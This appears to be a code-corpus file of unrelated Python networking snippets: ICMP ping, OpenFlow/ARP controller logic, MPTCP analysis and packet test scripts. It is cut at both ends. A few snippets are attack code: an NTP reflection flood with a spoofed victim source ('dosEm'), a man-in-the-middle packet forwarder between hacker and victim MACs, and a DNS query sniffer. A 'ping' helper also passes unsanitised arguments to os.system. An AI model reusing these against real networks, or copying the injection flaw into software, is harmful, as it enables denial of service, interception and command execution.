HeaderInformation(dict):\n \"\"\" Simple storage received IP and ICMP header informations \"\"\"\n def __init__(self, names, struct_format, data):\n unpacked_data = unpack(struct_format, data)\n dict.__init__(self, dict(zip(names, unpacked_data)))\n\n ICMP_MAX_RECV = 2048 # Max size of incoming buffer\n timeout = self.timeout / 1000.0\n\n while True: # Loop while waiting for packet or timeou+t\n select_start = self.timer()\n inputready, outputready, exceptready = select.select([current_socket], [], [], timeout)\n select_duration = (self.timer() - select_start)\n if inputready == []: # timeout\n return None, 0, 0, 0, 0\n\n receive_time = self.timer()\n\n packet_data, address = current_socket.recvfrom(ICMP_MAX_RECV)\n\n icmp_header = HeaderInformation(\n names=[\n \"type\", \"code\", \"checksum\",\n \"packet_id\", \"seq_number\"\n ],\n struct_format=\"!BBHHH\",\n data=packet_data[20:28]\n )\n\n if icmp_header[\"packet_id\"] == self.own_id: # Our packet\n ip_header = HeaderInformation(\n names=[\n \"version\", \"type\", \"length\",\n \"id\", \"flags\", \"ttl\", \"protocol\",\n \"checksum\", \"src_ip\", \"dest_ip\"\n ],\n struct_format=\"!BBHHHBBHII\",\n data=packet_data[:20]\n )\n packet_size = len(packet_data) - 28\n ip = socket.inet_ntoa(pack(\"!I\", ip_header[\"src_ip\"]))\n # XXX: Why not ip = address[0] ???\n return receive_time, packet_size, ip, ip_header, icmp_header\n\n timeout = timeout - select_duration\n if timeout <= 0:\n return None, 0, 0, 0, 0", "def _arp_send(dp, port_out, arp_code, ip_sender, ip_target, eth_dst='ff:ff:ff:ff:ff:ff',eth_src=None,eth_target='00:00:00:00:00:00'):\n\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n pkt = packet.Packet()\n\n # HACK: to reply as real interface on virtual machine\n if dp.id in LAN_TYPE_FORWARDERS and dp.id == 0xa:\n eth_src = \"08:00:27:e1:e4:83\"\n elif dp.id in LAN_TYPE_FORWARDERS and dp.id == 0xc:\n eth_src = \"08:00:27:52:fb:7d\"\n\n ##If no src_mac was provided we generate one from Datapath ID of forwarder that recieved message\n ##If Datapath ID starts with zeros we cannot use it as legit MAC address\n ##Second hex digit must be 2 to indicate localy administered non-multicast address\n if eth_src == None:\n str_hex_dpid = str(hex(dp.id)).rstrip('L').lstrip('0x')\n if len(str_hex_dpid) < 11:\n eth_src ='02'\n for i in range(10-len(str_hex_dpid)):\n eth_src += '0'\n eth_src += str_hex_dpid\n else:\n eth_src = dp.id\n\n eth = ethernet.ethernet(eth_dst, eth_src, ether.ETH_TYPE_ARP)\n arp_req = arp.arp_ip(arp_code, eth_src, ip_sender, eth_target, ip_target)\n\n pkt = packet.Packet()\n pkt.add_protocol(eth)\n pkt.add_protocol(arp_req)\n pkt.serialize()\n actions=[parser.OFPActionOutput(port_out)]\n out=parser.OFPPacketOut(datapath=dp, buffer_id=ofp.OFP_NO_BUFFER, in_port=ofp.OFPP_CONTROLLER, actions=actions, data=pkt.data)\n dp.send_msg(out)", "def send_echo_reply(s, in_eth, in_ip, payload):\n eth = ethhdr(in_eth.h_source, in_eth.h_dest, in_eth.h_proto)\n ip = iphdr(\n version=4,\n ihl=in_ip.ihl,\n id=in_ip.id,\n ttl=64,\n protocol=1,\n saddr=in_ip.daddr,\n daddr=in_ip.saddr,\n )\n ipopts = payload[0 : ip.ihl * 4 - len(ip)]\n icmp = icmphdr.from_buffer_copy(payload[len(ipopts) :])\n\n icmp.type = 0\n icmp.code = 0\n icmp.checksum = 0\n\n payload = payload[len(ipopts) + len(icmp) :]\n ip.tot_len = len(ip) + len(ipopts) + len(icmp) + len(payload)\n ip.check = checksum(bytearray(ip) + bytearray(ipopts))\n icmp.checksum = checksum(bytearray(icmp) + payload)\n\n msg = create_string_buffer(\n len(eth) + len(ip) + len(ipopts) + len(icmp) + len(payload)\n )\n msg = bytearray(eth) + bytearray(ip) + bytearray(ipopts) + bytearray(icmp) + payload\n\n print(\n \" %16s <- %16s ttl:%03d proto:%-3d icmp type:%-3d code:%-3d\"\n % (ip.daddr, ip.saddr, ip.ttl, ip.protocol, icmp.type, icmp.code)\n )\n s.send(msg)", "def spoof_packet(packet):", "def packet_handler(pkt):\n if pkt[Ether].type == 0x800:\n if pkt[IP].dst == VICTIM_IP:\n if pkt[Ether].dst == HACKER_MAC:\n print(pkt.summary()) # print spoofed packet\n pkt[Ether].dst = VICTIM_MAC\n PACKET_QUEUE.insert(0, pkt)", "def process_mptcp_pkt_from_server(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport):\n dss, dack, dss_is_8_bytes = get_dss_and_data_ack(tcp)\n conn_id = acks[daddr, dport, saddr, sport][co.CONN_ID]\n flow_id = acks[daddr, dport, saddr, sport][co.FLOW_ID]\n if conn_acks[conn_id][co.C2S] >= 0:\n max_val = 2**64 if dss_is_8_bytes else 2**32\n bytes_acked = (dack - conn_acks[conn_id][co.C2S]) % max_val\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if (size_payload > 0 and dss in conn_acks[conn_id][SEQ_S2C] and (dss - conn_acks[conn_id][co.S2C]) % max_val < 2000000000\n and (mptcp_connections[conn_id].attr[co.S2C][co.TIME_LAST_ACK_TCP] - ts_delta).total_seconds() > 0.0):\n # This is a DSS retransmission!\n mptcp_connections[conn_id].attr[co.S2C][co.RETRANS_DSS].append((ts_delta, flow_id, dss, conn_acks[conn_id][HSEQ_S2C][dss][2],\n ts_delta - conn_acks[conn_id][HSEQ_S2C][dss][0],\n ts_delta - conn_acks[conn_id][HSEQ_S2C][dss][1],\n ts_delta - conn_acks[conn_id][co.TIMESTAMP][SERVER]))\n conn_acks[conn_id][HSEQ_S2C][dss][1] = ts_delta\n elif size_payload > 0 and dss is not False:\n conn_acks[conn_id][SEQ_S2C].add(dss)\n conn_acks[conn_id][HSEQ_S2C][dss] = [ts_delta, ts_delta, ts_delta - conn_acks[conn_id][co.TIMESTAMP][SERVER]]\n\n conn_acks[conn_id][co.C2S] = dack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[conn_id][co.TIMESTAMP][SERVER] = ts_delta", "def ping(cmd, *args, **argv):\n import os\n context = argv[\"context\"]\n \n def count(num):\n if str(num) == str(int(num)):\n if num < 0:\n context.write(\"%s: bad number of packets to transmit.\" % cmd)\n else:\n return num\n else:\n context.write(\"%s: can't set unicast time-to-live: Unknown host\" % cmd)\n return\n\n ping_p = {\"-c\":count}\n\n def isipaddress(ip):\n import socket\n try:\n ipa = socket.gethostbyname(ip)\n return ipa\n except:\n context.write(\"ping: unknown host %s\" % ip)\n return None\n\n def doping(cmd, sign, sign_param, ipaddress):\n if sign in ping_p.keys():\n # #\n pass\n else:\n context.write(\"connect: Unknown host\")\n return \n \n\tif ping_p[sign](sign_param):\n # #\n pass\n else:\n return \n if isipaddress(ipaddress):\n ip = isipaddress(ipaddress)\n else:\n return\n try:\n os.system(str(cmd) + \" \" + str(sign) + \" \" + str(sign_param) + \" \" + str(ip))\n except:\n context.write(\"has some errors in ping command\")\n return \n\n length = len(args)\n \n if length == 0:\n helpinfo = context.resolver.get_func_doc(getattr(context.resolver.get_module(cmd), cmd))\n helpinfo_format = helpinfo[\"format\"].rstrip()\n helpinfo_format = helpinfo_format.lstrip()\n if helpinfo_format == \"\":\n return\n context.write(helpinfo_format)\n\n elif length < 3:\n cmd_real = context.resolver.has_command(args[0], cmd)\n if cmd_real != None:\n cmds = cmd.split()\n cmd_n = \"_\".join(cmds)\n modulename = cmd_n + \"_\" + cmd_real\n module = context.resolver.get_module(modulename)\n func = getattr(module, modulename)\n func(cmd + \" \" + cmd_real, context = context)\n else:\n doping(cmd, \"-c\", 4, args[0])\n\n else:\n\tif args[1] == \"0\":\n\t os.system(str(cmd) + \" \" + str(args[2]))\n\telse:\n doping(cmd, args[0], args[1], args[2])", "def process_mptcp_pkt_from_client(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport):\n dss, dack, dss_is_8_bytes = get_dss_and_data_ack(tcp)\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n flow_id = acks[saddr, sport, daddr, dport][co.FLOW_ID]\n if conn_acks[conn_id][co.S2C] >= 0:\n max_val = 2**64 if dss_is_8_bytes else 2**32\n bytes_acked = (dack - conn_acks[conn_id][co.S2C]) % max_val\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if (size_payload > 0 and dss in conn_acks[conn_id][SEQ_C2S] and (dss - conn_acks[conn_id][co.C2S]) % max_val < 2000000000\n and (mptcp_connections[conn_id].attr[co.C2S][co.TIME_LAST_ACK_TCP] - ts_delta).total_seconds() > 0.0):\n # This is a DSS retransmission! (take into account the seq overflow)\n mptcp_connections[conn_id].attr[co.C2S][co.RETRANS_DSS].append((ts_delta, flow_id, dss, conn_acks[conn_id][HSEQ_C2S][dss][2],\n ts_delta - conn_acks[conn_id][HSEQ_C2S][dss][0],\n ts_delta - conn_acks[conn_id][HSEQ_C2S][dss][1],\n ts_delta - conn_acks[conn_id][co.TIMESTAMP][CLIENT]))\n conn_acks[conn_id][HSEQ_C2S][dss][1] = ts_delta\n elif size_payload > 0 and dss is not False:\n conn_acks[conn_id][SEQ_C2S].add(dss)\n conn_acks[conn_id][HSEQ_C2S][dss] = [ts_delta, ts_delta, ts_delta - conn_acks[conn_id][co.TIMESTAMP][CLIENT]]\n\n conn_acks[conn_id][co.S2C] = dack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta\n conn_acks[conn_id][co.TIMESTAMP][CLIENT] = ts_delta", "def validate_ping(result):\n if '0 packets received' in str(result) or 'no answer from' in str(result) or '0 received' in str(result):\n print 'Conectividade - DOWN'\n return False\n print 'Conectividade - OK'\n return True", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def send_error(self, conn, msg):\n #print(\"THIS IS CONNNNNNNNNNNNNNNNNNNN\", conn.getsockname(), conn.getpeername()) \n usIP = conn.getpeername()[:-1] + \"1\" \n #print(usIP) \n no_route = {\"src\": usIP, \"dst\": msg[\"src\"], \"type\": \"no route\", \"msg\": {}}\n conn.send(json.dumps(no_route).encode(\"ascii\"))\n return", "def send_one_ping(my_socket, dest_addr, id):\n dest_addr = socket.gethostbyname(dest_addr)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n my_checksum = 0\n\n # Make a dummy heder with a 0 checksum.\n header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, my_checksum, id, 1)\n bytes_in_double = struct.calcsize(\"d\")\n data = (192 - bytes_in_double) * \"Q\"\n data = struct.pack(\"d\", time.time()) + data\n\n # Calculate the checksum on the data and the dummy header.\n my_checksum = checksum(header + data)\n\n # Now that we have the right checksum, we put that in. It's just easier\n # to make up a new header than to stuff it into the dummy.\n header = struct.pack(\n \"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), id, 1\n )\n packet = header + data\n my_socket.sendto(packet, (dest_addr, 1)) # Don't know about the 1", "def dosEm(target, ntplist, data, currentserver):\n ntpserver = ntplist[currentserver] #LOAD THE SERVER\n packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #CONSTRUIRE LE PAQUER\n send(packet,loop=1) #ENVOYER ", "def scapy_create_send_ICMP_customized(self, ipdst, ipsrc, send1=True, \\\n macdst=None, macsrc=None):\n ip_header = self.define_ip_header(dst=ipdst, src=ipsrc,\\\n ttl=self.ipttl, version=self.version)\n icmp_header = self.define_icmp_header(version=self.version)\n if send1:\n if (macdst == None):\n send(ip_header/icmp_header, verbose=self.verbose)\n else:\n ether_header = self.define_ethernet_header(src=macsrc, \\\n dst=macdst)\n sendp(ether_header/ip_header/icmp_header, verbose=self.verbose, \\\n iface=self.sourceiface)\n return\n\n pktcount = self.pktcount\n # If user does not specify pktcount, need calculate it based on\n # duration and interval\n if (pktcount == 0):\n pktcount = int(self.duration*1000/self.interval)\n send(ip_header/icmp_header, count=pktcount, inter=self.interval/1000.0,\n verbose=self.verbose)", "def getServerIP():\n # Create a UDP socket at client side\n UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.settimeout(0.15)\n\n \n for i in ['127.0.0.1']+list(range(0,256)):#iterating through all network IPs....127.0.0.1 is localhost\n try:\n IP=\"192.168.2.\"+str(i) if i!='127.0.0.1' else i #\n print(IP,end=\" \") \n UDPClientSocket.sendto(bytesToSend, (IP, 20001))#send message\n msg,IP = UDPClientSocket.recvfrom(bufferSize)#get response\n if (msg==str.encode(ACK_MESSAGE)):\n print()#printed IP wont clear without this command\n cls()#if IP found it clears all the console \n return IP[0]\n except Exception as e:\n print(e)\n \n return 0", "def ttl2ip(ttl, dest):\n\n fib = [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233]\n ips = [[44, 38, 10, e] for e in fib]\n return ips[ttl - 2]", "def main():\n args = TrafficScriptArg(\n [u\"src_mac\", u\"dst_mac\", u\"src_ip\", u\"dst_ip\", u\"dscp\"]\n )\n\n rxq = RxQueue(args.get_arg(u\"rx_if\"))\n txq = TxQueue(args.get_arg(u\"tx_if\"))\n\n src_mac = args.get_arg(u\"src_mac\")\n dst_mac = args.get_arg(u\"dst_mac\")\n src_ip = args.get_arg(u\"src_ip\")\n dst_ip = args.get_arg(u\"dst_ip\")\n dscp = int(args.get_arg(u\"dscp\"))\n\n ip_layer = IPv6 if ip_address(src_ip).version == 6 else IP\n\n sent_packets = list()\n pkt_send = (Ether(src=src_mac, dst=dst_mac) /\n ip_layer(src=src_ip, dst=dst_ip) /\n TCP())\n\n pkt_send /= Raw()\n sent_packets.append(pkt_send)\n txq.send(pkt_send)\n\n while True:\n pkt_recv = rxq.recv(2, sent_packets)\n if pkt_recv is None:\n raise RuntimeError(u\"ICMPv6 echo reply Rx timeout\")\n\n if pkt_recv.haslayer(ICMPv6ND_NS):\n # read another packet in the queue if the current one is ICMPv6ND_NS\n continue\n elif pkt_recv.haslayer(ICMPv6MLReport2):\n # read another packet in the queue if the current one is\n # ICMPv6MLReport2\n continue\n elif pkt_recv.haslayer(ICMPv6ND_RA):\n # read another packet in the queue if the current one is\n # ICMPv6ND_RA\n continue\n\n # otherwise process the current packet\n break\n\n if pkt_recv is None:\n raise RuntimeError(u\"Rx timeout\")\n\n if ip_layer == IP:\n check_ipv4(pkt_recv, dscp)\n else:\n check_ipv6(pkt_recv, dscp)\n\n sys.exit(0)", "def _send(self,msg):\n attempts = 3\n while attempts > 0:\n self.sock.sendto(msg, self.ip_port)\n ready = select.select([self.sock], [], [], self.timeout)\n if ready[0]:\n data, ip_port = self.sock.recvfrom(60)\n if ip_port != self.ip_port: continue\n return decode(data)\n attempts -= 1\n print(\"Retrying send\")\n return None", "def forward(p):\n try:\n if IP in p and p[IP].dst == RD_ADRRESS and p[Ether].src != GW_MAC_ADRRESS and p[Ether].dst == GW_MAC_ADRRESS:\n if p[IP].src not in black_list:\n send(p[1::], iface=IFACE, verbose=0)\n except:\n print(\"error in forward\")\n finally:\n sys.exit()", "def query_sniff(pkt):\n if IP in pkt:\n ip_src = pkt[IP].src\n ip_dst = pkt[IP].dst\n\n if pkt.haslayer(DNS) and pkt.getlayer(DNS).qr == 0:\n domain = pkt.getlayer(DNS).qd.qname.decode(\"utf-8\")\n now = datetime.now()\n stored_dns_requests.update({datetime.timestamp(now): domain})\n print(\"SRC: {} - DST: {} : {}\".format(ip_src, ip_dst, domain))", "def host_ping(self, src_host, dst_ip, 